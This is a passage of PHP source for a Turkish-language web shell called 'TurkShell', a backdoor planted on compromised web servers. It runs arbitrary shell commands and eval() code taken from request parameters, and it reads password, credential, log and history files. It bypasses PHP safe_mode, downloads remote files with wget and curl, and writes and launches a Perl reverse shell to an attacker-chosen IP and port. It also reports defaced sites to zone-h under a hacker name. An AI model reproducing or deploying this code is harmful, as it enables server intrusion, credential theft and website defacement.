if ($dlink=='cmdhlp'){\xaprint "<p><b>: Komutu A\xc5\237a\xc4\237\304\xb1ya Ekle ve Biz Ne \304\xb0\305\237e Yarad\xc4\261\xc4\x9f\xc4\261 Hakk\304\xb1nda Yard\xc4\xb1mc\304\xb1 Olal\xc4\xb1m :";print "<form method=get>";
input ("text","hlp","",35);print " ";\xainput ("submit","","Yard\304\261m","");print $ef; die();}\xaif (isset ($_REQUEST['hlp'])){$hlp=$_REQUEST['hlp'];\xaprint "<p><b>[ Yaz\304\261lan Komut: $sfnt".$hlp."$efnt ]";\xa$hlp = escapeshellcmd($hlp);print "<p><table width=100% height=30% bgcolor=#FF0000 border=2><tr><td>";\xaif (!function_exists(shell_exec)&&!function_exists(exec)&&\xa!function_exists(popen)&&!function_exists(system)&&!function_exists(passthru))
{print "<center><font color=white size=2><b>[ Sorry can't complete the operation ]</font></center>";}else {print "<pre><font color=white>";\xaif(!callfuncs("man $hlp | col -b")){print "<center><font size=2><b>[ Bitti. ]";}print "</pre></font>";}print "</td></tr></table>";die();}\xaif (isset($_REQUEST['indx'])&&!empty($_REQUEST['indxtxt']))\xa{if (touch ($_REQUEST['indx'])==true){\xa$fp=fopen($_REQUEST['indx'],"w+");fwrite ($fp,stripslashes($_REQUEST['indxtxt']));
fclose($fp);print "<p>[ $sfnt".$_REQUEST['indx']."$efnt created successfully !! ]</p>";print "<b><center>[ <a href='javascript:history.back()'>Yeniden Editle</a>\xa] -- [<a href=".inclink('dlink', 'scurrdir')."&scdir=$nscdir> Curr-Dir </a>]</center></b>";die(); }else {print "<p>[ Sorry, Can't create the index !! ]</p>";die();}}\xaif ($dlink=='qindx'&&!isset($_REQUEST['qindsub'])){\xaprint $sf."<br>";print "<p><textarea cols=50 rows=10 name=indxtxt>
\304\260ndex kodlar\xc4\xb1n\xc4\xb1 buraya yaz</textarea></p>";\xainput ("text","indx","\304\xb0ndex Ad\xc4\261",35);print " ";\xainput ("submit","qindsub","Olu\xc5\237tur","");print $ef;die();}\xaif (isset ($_REQUEST['mailsub'])&&!empty($_REQUEST['mailto'])){
$mailto=$_REQUEST['mailto'];$subj=$_REQUEST['subj'];$mailtxt=$_REQUEST['mailtxt'];\xaif (mail($mailto,$subj,$mailtxt)){print "<p>[ Mail sended to $sfnt".$mailto." $efnt successfully ]</p>"; die();}else {print "<p>[ Error, Can't send the mail ]</p>";die();}} elseif(isset ($mailsub)&&empty($mailto)) {print "<p>[ Error, Can't send the mail ]</p>";die();}\xaif ($dlink=='mail'&&!isset($_REQUEST['mailsub'])){\xaprint $sf."<br>";print "<p><textarea cols=50 rows=10 name=mailtxt>
Mesaj\xc4\261n\304\xb1 buraya yaz</textarea></p>";input ("text","mailto","mail adresi",35);print " ";input ("text","subj","Ba\305\x9fl\xc4\xb1k",20);print " ";\xainput ("submit","mailsub","G\xc3\xb6nder","");print $ef;die();}\xaif (isset($_REQUEST['zonet'])&&!empty($_REQUEST['zonet'])){callzone($nscdir);}
function callzone($nscdir){
if (is_writable($nscdir)){$fpz=fopen ("z.pl","w");$zpl='z.pl';$li="bklist.txt";}
else {$fpz=fopen ("/tmp/z.pl","w");$zpl='/tmp/z.pl';$li="/tmp/bklist.txt";}
fwrite ($fpz,"\$arq = @ARGV[0];
\$grupo = @ARGV[1];\xachomp \$grupo;\xaopen(a,\"<\$arq\");
@site = <a>;
close(a);\xa\$b = scalar(@site);\xafor(\$a=0;\$a<=\$b;\$a++)\xa{chomp \$site[\$a];\xaif(\$site[\$a] =~ /http/) { substr(\$site[\$a], 0, 7) =\"\"; }\xaprint \"[+] Sending \$site[\$a]\n\";
use IO::Socket::INET;\xa\$sock = IO::Socket::INET->new(PeerAddr => \"old.zone-h.org\", PeerPort => 80, Proto => \"tcp\") or next;\xaprint \$sock \"POST /en/defacements/notify HTTP/1.0\r\n\";
print \$sock \"Accept: */*\r\n\";
print \$sock \"Referer: http://old.zone-h.org/en/defacements/notify\r\n\";\xaprint \$sock \"Accept-Language: pt-br\r\n\";\xaprint \$sock \"Content-Type: application/x-www-form-urlencoded\r\n\";
print \$sock \"Connection: Keep-Alive\r\n\";
print \$sock \"User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\r\n\";
print \$sock \"Host: old.zone-h.org\r\n\";\xaprint \$sock \"Content-Length: 385\r\n\";\xaprint \$sock \"Pragma: no-cache\r\n\";
print \$sock \"\r\n\";
print \$sock \"notify_defacer=\$grupo¬ify_domain=http%3A%2F%2F\$site[\$a]¬ify_hackmode=22¬ify_reason=5¬ify=+OK+\r\n\";\xaclose(\$sock);}");\xaif (touch ($li)==true){$fpl=fopen($li,"w+");fwrite ($fpl,$_REQUEST['zonetxt']);\xa}else{print "<p>[ Can't complete the operation, try change the current dir with writable one ]<br>";}$zonet=$_REQUEST['zonet'];\xaif (!function_exists(exec)&&!function_exists(shell_exec)&&!function_exists(popen)&&!function_exists(system)&&!function_exists(passthru))
{print "[ Can't complete the operation !! ]";}
else {callfuncs("chmod 777 $zpl;chmod 777 $li");\xaob_start();callfuncs("perl $zpl $li $zonet");ob_clean();
print "<p>[ All sites should be sended to zone-h.org successfully !! ]";die();}\xa}if ($dlink=='zone'&&!isset($_REQUEST['zonesub'])){\xaprint $sf."<br>";print "<p><pre><textarea cols=50 rows=10 name=zonetxt>\xawww.site1.com
www.site2.com\xa</textarea></pre></p>";input ("text","zonet","Hacker-name",35);print " ";\xainput ("submit","zonesub","Send","");print $ef;die();}\xaprint "</div></b></center>"; print"</td></tr>";print"</table>";print "<br>";\xafunction inisaf($iniv) { $chkini=ini_get($iniv);\xaif(($chkini || strtolower($chkini)) !=='on'){print"<font color=red ><b>Safe Mod Kapal\xc4\xb1 G\303\266z\xc3\xbck\303\xbcyor. Ancak Engelli Fonksiyonlar Bulunabilir.</b></font>";} else{
print"<font color=red><b>A\xc3\247\xc4\xb1k ( G\xc3\274venli )</b></font>";}}function inifunc($inif){$chkin=ini_get($inif);\xaif ($chkin==""){print " <font color=red><b>Yok</b></font>";}
else {$nchkin=wordwrap($chkin,40,"\n", 1);print "<b><font color=red >".$nchkin."</font></b>";}}function callocmd($ocmd,$owhich){if(function_exists(exec)){$nval=exec($ocmd);}elseif(!function_exists(exec)){$nval=shell_exec($ocmd);}
elseif(!function_exists(shell_exec)){$opop=popen($ocmd,'r');\xawhile (!feof($opop)){ $nval= fgetc($opop);}}\xaelseif(!function_exists(popen)){ ob_start();system($ocmd);$nval=ob_get_contents();ob_clean();}elseif(!function_exists(system)){
ob_start();passthru($ocmd);$nval=ob_get_contents();ob_clean();}\xaif($nval=$owhich){print"<font color=red><b>ON</b></font>";}
else{print"<font color=red ><b>OFF</b></font>";} }\xaprint"<table bgcolor=#191919 style=\"border:2px #FF0000 solid ;font-size:13px;font-family:tahoma \" width=100% height=%>";
print"<tr><td>"; print"<center><br>";\xaprint"<b>Safe-mode :\t";print inisaf('safe_mode');print "</b>";print"</center>";
if (!function_exists(exec)&&!function_exists(shell_exec)&&!function_exists(popen)&&!function_exists(system)&&!function_exists(passthru)||strstr(PHP_OS,"WIN")){print "";}else{print "<table bgcolor=#191919 width=100% height=% style='font-size:13px;font-family:tahoma'><tr><td>";
print "<div align=center>"; print"<br><b>Mysql : </b>";
callocmd('which mysql','/usr/bin/mysql');\xaprint"</td>"; print"<td>"; print"<br><b>Perl : </b>";
callocmd('which perl',('/usr/bin/perl')||'/usr/local/bin/perl');print"</td>"; print"<td>"; print"<br><b>Gcc : </b>";
callocmd('which gcc','/usr/bin/gcc'); print"</td>"; print"<td>";
print"<br><b>Curl : </b>"; callocmd('which curl','/usr/bin/curl'); print"</td>"; print"<td>"; print"<br><b>GET : </b>";\xacallocmd('which GET','/usr/bin/GET');\xaprint"</td>"; print"<td>";print"<br><b>Wget : </b>";\xacallocmd('which wget','/usr/bin/wget');\xaprint"</td>"; print"<td>"; print"<br><b>Lynx : </b>";
callocmd('which lynx','/usr/bin/lynx');\xaprint"</td>"; print "</tr></table>"; }print "<hr><br>";
print "<br><table style=\"border:2px #FF0000 solid \" width=100% height=%>"; print"<tr><td><font size=2 face=tahoma>";\xaprint "<b>IP Numaran\304\261z : ".$REMOTE_ADDR."<br></b>";\xaprint "<b>Server IP Numaras\304\261 : ".$SERVER_ADDR."</b>";\xaprint"<br><b>".$SERVER_SIGNATURE."</b>";\xaprint "<b>Server Ad\304\261 : ".$SERVER_NAME." / "."Email : ".$SERVER_ADMIN."<br></b>";\xaprint "<b>Engelli Fonksiyonlar : </b>";inifunc(disable_functions);print"<br>";\xaprint "<b>Kimsiniz : <b>"; callfuncs('id');print"<br><b>Os : </b>";\xaif (strstr( PHP_OS, "WIN")){print php_uname(); print " ";print PHP_OS; }else {
if (!function_exists(shell_exec)&&!function_exists(exec)&&\xa!function_exists(popen)&&!function_exists(system)&&!function_exists(passthru))\xa{print php_uname(); print "/";print PHP_OS;}\xaelse {callfuncs('uname -a');}}print"<br>";\xaprint"Php-versiyon : ".phpversion(); print"<br><b>Bulundu\304\237unuz Ana Dizin : </b>";
print $nscdir." [ ";permcol($nscdir);print " ]";
print"<br>";print "TurkShell Burada : " .__file__;
print"<br> Toplam Alan: "; readable_size(disk_total_space($nscdir));print " / ";
print"Bos Alan: "; readable_size(disk_free_space($nscdir));\xaprint "</center><br></font>"; print"</td></tr></table><br>";\xaif (isset($_REQUEST['credir'])) { $ndir=trim($_REQUEST['dir']);
if (mkdir( $ndir, 0777 )){ $mess=basename($ndir)." created successfully"; }\xaelse{$mess="Klas\303\xb6r Olu\xc5\x9ftur/Sil";}}elseif (isset($_REQUEST['deldir']))
{ $nrm=trim($_REQUEST['dir']);if (is_dir($nrm)&& rmdir($nrm)){$mess=basename($nrm)." deleted successfully"; }else{$mess="Create/Delete Dir";}}\xaelse{$mess="Klas\303\266r Olustur/Sil";}if(isset($_REQUEST['crefile'])){
$ncfile=trim($_REQUEST['cfile']);\xaif (!is_file($ncfile)&&touch($ncfile)){ $mess3=basename($ncfile)." created succefully";unset ($_REQUEST['cfile']);}\xaelse{ $mess3= "Dosya Olustur/Sil";}}\xaelseif(isset($_REQUEST['delfile'])){\xa$ndfile=trim($_REQUEST['cfile']);\xaif (unlink($ndfile)) {$mess3=basename($ndfile)." deleted succefully";}\xaelse {$mess3= "Dosya Olustur/Sil";}}\xaelse {$mess3="Dosya Olustur/Sil";}
class upload{ function upload($file,$tmp){\xa$nscdir =(!isset($_REQUEST['scdir']))?getcwd():chdir($_REQUEST['scdir']);$nscdir=getcwd();if (isset($_REQUEST["up"])){ if (empty($upfile)){print "";}\xaif (@copy($tmp,$nscdir."/".$file)){
print "<div><center><b><font color=red > $file </font>dosyas\304\261 ba\305\237ar\304\xb1yla y\xc3\xbcklenmi\305\237tir.</b></center></div>"; }else{print "<center><b>: Error uploading<font color=red> $file </font>: </b></center>";} } } }\xa$obj=new upload($HTTP_POST_FILES['upfile']['name'],$HTTP_POST_FILES['upfile']['tmp_name']); if (isset ($_REQUEST['ustsub'])){
$ustname=trim ($_REQUEST['ustname']);ob_start();
if ($_REQUEST['ustools']='t1'){callfuncs('wget '.$ustname);}\xaif ($_REQUEST['ustools']='t2'){callfuncs('curl -o basename($ustname) $ustname');}\xaif ($_REQUEST['ustools']='t3'){callfuncs('lynx -source $ustname > basename($ustname)');}\xaif ($_REQUEST['ustools']='t9'){callfuncs('GET $ustname > basename($ustname)');}
if ($_REQUEST['ustools']='t4'){callfuncs('unzip '.$ustname);}
if ($_REQUEST['ustools']='t5'){callfuncs('tar -xvf '.$ustname);}\xaif ($_REQUEST['ustools']='t6'){callfuncs('tar -zxvf '.$ustname);}
if ($_REQUEST['ustools']='t7'){callfuncs('chmod 777 '.$ustname);}\xaif ($_REQUEST['ustools']='t8'){callfuncs('make '.$ustname);}ob_clean();}\xaif (!isset($_REQUEST['cmd'])&&!isset($_REQUEST['eval'])&&!isset($_REQUEST['rfile'])&&!isset($_REQUEST['edit'])&&!isset($_REQUEST['subqcmnds'])&&!isset ($_REQUEST['safefile'])&&!isset ($_REQUEST['inifile'])&&!isset($_REQUEST['bip'])&&
!isset($_REQUEST['rfiletxt'])){\xaif ($dh = dir($nscdir)){ while (true == ($filename =$dh->read())){
$files[] = $filename; sort($files);}print "<br>";
print"<center><table bgcolor=#2A2A2A style=\"border:1px solid white\" width=100% height=6% ></center>";
print "<tr><td width=43% style=\"border:1px solid white\">";\xaprint "<center><b>Dosyalar";print "</td>";
print "<td width=8% style=\"border:1px solid white\">";print "<center><b>Boyutlar";print "</td>";
print "<td width=3% style=\"border:1px solid white\">";print "<center><b>Yazma";print "</td>";\xaprint "<td width=3% style=\"border:1px solid white\">";print "<center><b>Okuma";print "</td>";
print "<td width=5% style=\"border:1px solid white\">";print "<center><b>T\xc3\274r";print "</td>";
print "<td width=5% style=\"border:1px solid white\">";print "<center><b>D\xc3\xbczenleme";print "</td>";\xaprint "<td width=5% style=\"border:1px solid white\">";print "<center><b>Adland\xc4\xb1rma";print "</td>";
print "<td width=6% style=\"border:1px solid white\">";print "<center><b>\xc4\xb0ndir";print "</td>";if(strstr(PHP_OS,"Linux")){
print "<td width=8% style=\"border:1px solid white\">";print "<center><b>Grup";print "</td>";}
print "<td width=8% style=\"border:1px solid white\">";print "<center><b>\xc4\xb0zinler";print "</td></tr>"; foreach ($files as $nfiles){
if (is_file("$nscdir/$nfiles")){ $scmess1=filesize("$nscdir/$nfiles");}
if (is_writable("$nscdir/$nfiles")){
$scmess2= "<center><font color=red >Evet";}else {$scmess2="<center><font color=red>Hayir";}if (is_readable("$nscdir/$nfiles")){\xa$scmess3= "<center><font color=red >Evet";}else {$scmess3= "<center><font color=red>Hayir";}if (is_dir("$nscdir/$nfiles")){$scmess4= "<font color=red><center>Klas\303\xb6r";}else{$scmess4= "<center><font color=red >Dosya";}
print"<tr><td style=\"border:1px solid white\">";
if (is_dir($nfiles)){print "<font face= tahoma size=2 color=red >[ $nfiles ]<br>";}else {print "<font face= tahoma size=2 color=#FF0000>$nfiles <br>";}\xaprint"</td>"; print "<td style=\"border:1px solid white\">";
print "<center><font face= tahoma size=2 color=#FF0000>";
if (is_dir("$nscdir/$nfiles")){print "<b>K</b>las\303\266r";}
elseif(is_file("$nscdir/$nfiles")){readable_size($scmess1);}else {print "---";}
print "</td>"; print "<td style=\"border:1px solid white\">";
print "<center><font face= tahoma size=2 >$scmess2"; print "</td>";\xaprint"<td style=\"border:1px solid white\">";
print "<center><font face= tahoma size=2 >$scmess3"; print "</td>";
print "<td style=\"border:1px solid white\">";
print "<center><font face= tahoma size=2 >$scmess4"; print"</td>";\xaprint "<td style=\"border:1px solid white\">";if(is_file("$nscdir/$nfiles")){\xaprint " <center><a href=".inclink('dlink', 'edit')."&edit=$nfiles&scdir=$nscdir>D\xc3\xbczenle</a>";}else {print "<center><font face=tahoma size=2 color=gray>D\xc3\xbczenle</center>";}print"</td>"; print "<td style=\"border:1px solid white\">";print " <center><a href=".inclink('dlink', 'ren')."&ren=$nfiles&scdir=$nscdir>Adlandir</a>";print"</td>";print "<td style=\"border:1px solid white\">";\xaif(is_file("$nscdir/$nfiles")){\xaprint " <center><a href=".inclink('dlink', 'dwld')."&dwld=$nfiles&scdir=$nscdir>indir</a>";}else {print "<center><font face=tahoma size=2 color=gray>indir</center>";}print"</td>"; if(strstr(PHP_OS,"Linux")){
print "<td style=\"border:1px solid white\">";\xaprint "<center><font face=tahoma size=2 color=#FF0000>";owgr($nfiles);\xaprint "</center>";print"</td>";}
print "<td style=\"border:1px solid red \">";print "<center><div>";\xapermcol("$nscdir/$nfiles");print "</div>";print"</td>"; print "</tr>";\xa}print "</table>";print "<br>";}else {print "<div><br><center><b>[ \304\xb0zin Verilmiyor. ]<p>";}}
elseif (!isset($_REQUEST['rfile'])&&isset($_REQUEST['cmd'])||isset($_REQUEST['eval'])||isset($_REQUEST['subqcmnds'])){
if (!isset($_REQUEST['rfile'])&&isset($_REQUEST['cmd'])){print "<div><b><center>[ Executed command ][$] : ".$_REQUEST['cmd']."</div></center>";}\xaprint "<pre><center>".$sta;\xaif (isset($_REQUEST['cmd'])){$cmd=trim($_REQUEST['cmd']);callfuncs($cmd);}
elseif(isset($_REQUEST['eval'])){\xaob_start();eval(stripslashes(trim($_REQUEST['eval'])));
$ret = ob_get_contents();ob_clean();print htmlspecialchars($ret);}\xaelseif (isset($_REQUEST['subqcmnds'])){
if ($_REQUEST['uscmnds']=='op1'){callfuncs('ls -lia');}\xaif ($_REQUEST['uscmnds']=='op2'){callfuncs('cat /etc/passwd');}\xaif ($_REQUEST['uscmnds']=='op3'){callfuncs('cat /var/cpanel/accounting.log');}\xaif ($_REQUEST['uscmnds']=='op4'){callfuncs('ls /var/named');}\xaif ($_REQUEST['uscmnds']=='op11'){callfuncs('find ../ -type d -perm -2 -ls');}\xaif ($_REQUEST['uscmnds']=='op12'){callfuncs('find ./ -type d -perm -2 -ls');}\xaif ($_REQUEST['uscmnds']=='op5'){callfuncs('find ./ -name service.pwd ');}
if ($_REQUEST['uscmnds']=='op6'){callfuncs('find ./ -name config.php');}\xaif ($_REQUEST['uscmnds']=='op7'){callfuncs('find / -type f -name .bash_history');}
if ($_REQUEST['uscmnds']=='op8'){callfuncs('cat /etc/hosts');}\xaif ($_REQUEST['uscmnds']=='op9'){callfuncs('finger root');}\xaif ($_REQUEST['uscmnds']=='op10'){callfuncs('netstat -an | grep -i listen');}\xaif ($_REQUEST['uscmnds']=='op13'){callfuncs('cat /etc/services');}\xa}print $eta."</center></pre>";}
function rdread($nscdir,$sf,$ef){$rfile=trim($_REQUEST['rfile']);
if(is_readable($rfile)&&is_file($rfile)){\xa$fp=fopen ($rfile,"r");print"<center>";\xaprint "<div><b>[ Editing <font color=red >".basename($rfile)."</font> ] [<a href='javascript:history.back()'> Geri </a>] [<a href=".inclink('dlink','rdcurrdir')."&scdir=$nscdir> Curr-Dir </a>]</b></div><br>";
print $sf."<textarea cols=157 rows=23 name=rfiletxt>";\xawhile (!feof($fp)){$lines = fgetc($fp);
$nlines=htmlspecialchars($lines);print $nlines;}\xafclose($fp);print "</textarea>";if (is_writable($rfile)){\xaprint "<center><input type=hidden value=$rfile name=hidrfile><input type=submit value='Kaydet' > <input type=reset value='Reset' ></center>".$ef;}else\xa{print "<div><b><center>[ Can't edit <font color=red >".basename($rfile)."</font> ]</center></b></div><br>";}print "</center><br>";}
elseif (!file_exists($_REQUEST['rfile'])||!is_readable($_REQUEST['rfile'])||$_REQUEST['rfile']=$nscdir){print "<div><b><center>[ Safe Mod kapal\xc4\xb1 oldu\xc4\237u halde, engelli fonksiyonlar bulundu\304\237undan dolay\304\261 iste\304\x9finize cevap verilememektedir. ]</center></b></div><br>";}}
function rdsave($nscdir){$hidrfile=trim($_REQUEST['hidrfile']);\xaif (is_writable($hidrfile)){$rffp=fopen ($hidrfile,"w+");\xa$rfiletxt=stripslashes($_REQUEST['rfiletxt']);\xafwrite ($rffp,$rfiletxt);print "<div><b><center>\xa[ <font color=red >".basename($hidrfile)."</font> Ba\305\x9far\xc4\xb1yla D\xc3\274zenlendi. ]
[<a href=".inclink('dlink','rdcurrdir')."&scdir=$nscdir> Curr-Dir </a>] [<a href='javascript:history.back()'> Edit again </a>]
</center></b></div><br>";fclose($rffp);}
else {print "<div><b><center>[ Can't save the file !! ] [<a href=".inclink('dlink','rdcurrdir')."&scdir=$nscdir> Curr-Dir </a>] [<a href='javascript:history.back()'> Back </a>]</center></b></div><br>";}}
if (isset ($_REQUEST['rfile'])&&!isset($_REQUEST['cmd'])){rdread($nscdir,$sf,$ef);}\xaelseif (isset($_REQUEST['rfiletxt'])){rdsave($nscdir);}\xafunction callperms($chkperms){
$perms = fileperms($chkperms);\xaif (($perms & 0xC000) == 0xC000) {\xa // Socket
$info = 's';
} elseif (($perms & 0xA000) == 0xA000) {
// Symbolic Link\xa $info = 'l';
} elseif (($perms & 0x8000) == 0x8000) {\xa // Regular\xa $info = '-';
} elseif (($perms & 0x6000) == 0x6000) {\xa // Block special
$info = 'b';\xa} elseif (($perms & 0x4000) == 0x4000) {
// Directory\xa $info = 'd';
} elseif (($perms & 0x2000) == 0x2000) {\xa // Character special\xa $info = 'c';
} elseif (($perms & 0x1000) == 0x1000) {
// FIFO pipe\xa $info = 'p';
} else {\xa // Unknown
$info = 'u';\xa}
\xa// Owner
$info .= (($perms & 0x0100) ? 'r' : '-');\xa$info .= (($perms & 0x0080) ? 'w' : '-');
$info .= (($perms & 0x0040) ?\xa (($perms & 0x0800) ? 's' : 'x' ) :
(($perms & 0x0800) ? 'S' : '-'));\xa
// Group
$info .= (($perms & 0x0020) ? 'r' : '-');
$info .= (($perms & 0x0010) ? 'w' : '-');\xa$info .= (($perms & 0x0008) ?
(($perms & 0x0400) ? 's' : 'x' ) :
(($perms & 0x0400) ? 'S' : '-'));\xa
// World\xa$info .= (($perms & 0x0004) ? 'r' : '-');
$info .= (($perms & 0x0002) ? 'w' : '-');\xa$info .= (($perms & 0x0001) ?\xa (($perms & 0x0200) ? 't' : 'x' ) :
(($perms & 0x0200) ? 'T' : '-')); print $info;}
function readable_size($size) {\xa\xaif ($size < 1024) {
print $size . ' B';
}else {$units = array("kB", "MB", "GB", "TB");\xaforeach ($units as $unit) {\xa$size = ($size / 1024);\xaif ($size < 1024) {break;}}printf ("%.2f",$size);print ' ' . $unit;}}
if($dlink=='ren'&&!isset($_REQUEST['rensub'])){
print "<div><b><center>[<a href=".$PHP_SELF."?scdir=$nscdir> Geri </a>]</div>";
print "<center>".$sf;input ("text","ren",$_REQUEST['ren'],20);print " ";\xainput ("text","renf","New-name",20);print " ";
input ("submit","rensub","Rename" ,"");print $ef;die();}else print "";
if (isset ($_REQUEST['ren'])&&isset($_REQUEST['renf'])){
if (rename($nscdir."/".$_REQUEST['ren'],$nscdir."/".$_REQUEST['renf'])){\xaprint"<center><div><b>[ ". $_REQUEST['ren']." is renamed to " .$sfnt.$_REQUEST['renf'].$efnt." successfully ]</center></div></b>";print "<div><b><center>[<a href=".inclink('dlink', 'rcurrdir')."&scdir=$nscdir> Curr-dir </a>]</div>";die();}else{print "<div><b><center>[ Yeniden Adlandirilamiyor ]</div>";
print "<div><b><center>[<a href=".inclink('dlink', 'rcurrdir')."&scdir=$nscdir> Geri </a>]</div>";die();}}function fget($nscdir,$sf,$ef){print "<center>";
print "<div><b>[ D\xc3\xbczenlenen Dosya: <font color=red >".basename($_REQUEST['edit'])."</font> ] [<a href='javascript:history.back()'> Geri </a>] [<a href=".inclink('dlink', 'scurrdir')."&scdir=$nscdir> Curr-Dir </a>]</b></div>";\xaprint $sf."<textarea cols=157 rows=23 name=edittxt>"; $alltxt= file_get_contents($_REQUEST['edit']);\xa$nalltxt=htmlspecialchars($alltxt);print $nalltxt;print "</textarea></center>";\xaif (is_writable($_REQUEST['edit'])){\xaprint "<center><input type=submit value='Save-file' > <input type=reset value='Reset' ></center>".$ef;}else {print "<div><b><center>[ Can't edit\xa<font color=red >".basename($_REQUEST['edit'])."</font> ]</center></b></div><br>";}}function svetxt(){
$fp=fopen ($_REQUEST['edit'],"w");if (is_writable($_REQUEST['edit'])){
$nedittxt=stripslashes($_REQUEST['edittxt']);\xafwrite ($fp,$nedittxt);print "<div><b><center>[ <font color=red >".basename($_REQUEST['edit'])."</font> Saved !! ]</center></b></div>";fclose($fp);}else {print "<div><b><center>[ Can't save the file !! ]</center></b></div>";}}\xaif ($dlink=='edit'&&!isset ($_REQUEST['edittxt'])&&!isset($_REQUEST['rfile'])&&!isset($_REQUEST['cmd'])&&!isset($_REQUEST['subqcmnds'])&&!isset($_REQUEST['eval']))\xa{fget($nscdir,$sf,$ef);}elseif (isset ($_REQUEST['edittxt']))\xa{svetxt();fget($nscdir,$sf,$ef);}else {print "";}function owgr($file){
$fileowneruid=fileowner($file); $fileownerarray=posix_getpwuid($fileowneruid);\xa$fileowner=$fileownerarray['name']; $fileg=filegroup($file);\xa$groupinfo = posix_getgrgid($fileg);$filegg=$groupinfo['name'];
print "$fileowner/$filegg"; }$cpyf=trim($_REQUEST['cpyf']);$ftcpy=trim($_REQUEST['ftcpy']);$cpmv= $cpyf.'/'.$ftcpy;if (isset ($_REQUEST['cpy'])){\xaif (copy($ftcpy,$cpmv)){$cpmvmess=basename($ftcpy)." copied successfully";}else {$cpmvmess="Can't copy ".basename($ftcpy);}}\xaelseif(isset($_REQUEST['mve'])){
if (copy($ftcpy,$cpmv)&&unlink ($ftcpy)){$cpmvmess= basename($ftcpy)." moved successfully";}else {$cpmvmess="Can't move ".basename($ftcpy);}\xa}else {$cpmvmess="Kopyala/Ta\xc5\x9f\xc4\xb1mak \xc4\260\xc3\xa7in Dosya Se\303\247";}
if (isset ($_REQUEST['safefile'])){\xa$file=$_REQUEST['safefile'];$tymczas="";if(empty($file)){
if(empty($_GET['file'])){if(empty($_POST['file'])){
print "<center>[ Please choose a file first to read it using copy() ]</center>";
} else {$file=$_POST['file'];}} else {$file=$_GET['file'];}}\xa$temp=tempnam($tymczas, "cx");if(copy("compress.zlib://".$file, $temp)){\xa$zrodlo = fopen($temp, "r");$tekst = fread($zrodlo, filesize($temp));\xafclose($zrodlo);echo "<center><pre>".$sta.htmlspecialchars($tekst).$eta."</pre></center>";unlink($temp);} else {\xaprint "<FONT COLOR=\"RED\"><CENTER>Uygulamaya esnas\304\xb1nda sunucunun yazma izni vermemesinden dolay\xc4\261 i\xc5\x9flem ba\305\237ar\xc4\261s\xc4\261z sonu\xc3\xa7land\xc4\xb1r\xc4\xb1lm\xc4\261\305\x9ft\xc4\xb1r.
</CENTER></FONT><br>";}}if (isset ($_REQUEST['inifile'])){
ini_restore("safe_mode");ini_restore("open_basedir");
print "<center><pre>".$sta;\xaif (include(htmlspecialchars($_REQUEST['inifile']))){}else {print "Sorry, can't read the selected file !!";}print $eta."</pre></center>";}
if (isset ($_REQUEST['bip'])&&isset ($_REQUEST['bport'])){callback($nscdir,$_REQUEST['bip'],$_REQUEST['bport']);}
function callback($nscdir,$bip,$bport){
if(strstr(php_os,"WIN")){$epath="cmd.exe";}else{$epath="/bin/sh";}
if (is_writable($nscdir)){\xa$fp=fopen ("back.pl","w");$backpl='back.pl';}
else {$fp=fopen ("/tmp/back.pl","w");$backpl='/tmp/back.pl';}
fwrite ($fp,"use Socket;\xa\$system='$epath';\xa\$sys= 'echo \"[ Operating system ][$]\"; echo \"`uname -a`\";\xaecho \"[ Curr DIR ][$]\"; echo \"`pwd`\";echo;
echo \"[ User perms ][$]\";echo \"`id`\";echo;
echo \"[ Start shell ][$]\";';\xa
if (!\$ARGV[0]) {
exit(1);
}
\$host = \$ARGV[0];
\$port = 80;
if (\$ARGV[1]) {
\$port = \$ARGV[1];
}
\$proto = getprotobyname('tcp') || die('Unknown Protocol\n');\xasocket(SERVER, PF_INET, SOCK_STREAM, \$proto) || die ('Socket Error\n');
my \$target = inet_aton(\$host);
if (!connect(SERVER, pack 'SnA4x8', 2, \$port, \$target)) {
die('Unable to Connect\n');\xa}
if (!fork( )) {
open(STDIN,'>&SERVER');
open(STDOUT,'>&SERVER');\xa open(STDERR,'>&SERVER');\xaprint '\n[ Wardom Bu kodlar Megabros Taraf\xc4\xb1ndan kodlanm\xc4\261\305\x9f Arka pLan\304\xb1 Programlanm\304\261\305\237t\304\xb1r ]';\xaprint '\n[ Wardom ][ Megabrosl ]\n\n';\xa system(\$sys);system (\$system);\xa exit(0); }
\x9 ");callfuncs("chmod 777 $backpl");\xaob_start();
callfuncs("perl $backpl $bip $bport");\xaob_clean();\xaprint "<div><b><center>[ Selected IP is ".$_REQUEST['bip']." and port is ".$_REQUEST['bport']." ]<br>
[ Check your connection now, if failed try changing the port number ]<br>\xa[ Or Go to a writable dir and then try to connect again ]<br>\xa[ Return to the Current dir ] [<a href=".inclink('dlink', 'scurrdir')."&scdir=$nscdir> Curr-Dir </a>]\xa</div><br>";}if (isset($_REQUEST['uback'])){
$uback=$_REQUEST['uback'];$upip=$_REQUEST['upip'];
if ($_REQUEST['upports']=="up80"){callfuncs("perl $uback $upip 80");}
elseif ($_REQUEST['upports']=="up443"){callfuncs("perl $uback $upip 443");}\xaelseif ($_REQUEST['upports']=="up2121"){callfuncs("perl $uback $upip 2121");}}
delm("<font face=Tahoma color=#FFFFFF size=2>Komut \303\x87al\xc4\261\305\237t\xc4\261r");print "<table bgcolor=#2A2A2A style=\"border:2px solid white\" width=100% height=18%>";\xaprint "<tr><td width=32%><div align=left>";
print $st.$c1."<center><div><b>".$mess3.$ec;
print $c2.$sf."<center>";input("text","cfile","",53);
input("hidden","scdir",$nscdir,0);print "<br>";
input("submit","crefile","Olustur","");
print " ";input("submit","delfile","Sil","");
print "</center>".$ef.$ec.$et."</div></td>";\xaprint "<td><div align=center>".$st.$c1;\xaprint "<center><div><b>Komut Gir";print $ec;\xaprint $c2.$sf."<center><div style='margin-top:7px'>";
input("text","cmd","",59);input("hidden","scdir",$nscdir,0);print"<br>";
input("submit","","Ger\xc3\xa7ekle\305\x9ftir","");print "</center>".$ef.$ec.$et."</div></td>";\xaprint "<td width=32%><div align=right>";print $st.$c1;\xaprint "<center><div><b>$mess".$ec.$c2.$sf."<center>";\xainput("text","dir","",53);input("hidden","scdir",$nscdir,0);print "<br>";
input("submit","credir","Olu\305\x9ftur","");print " ";\xainput("submit","deldir","Sil","");\xaprint "</center>".$ef.$ec.$et."</div></td></tr>";\xaprint "<tr><td width=32%><div align=left>";print $st.$c1;
print "<center><div><b>Dosya D\303\274zenle/Oku".$ec;print $c2.$sf."<center>";\xainput("text","rfile",$nscdir,53);input("hidden","scdir",$nscdir,0);print "<br>";
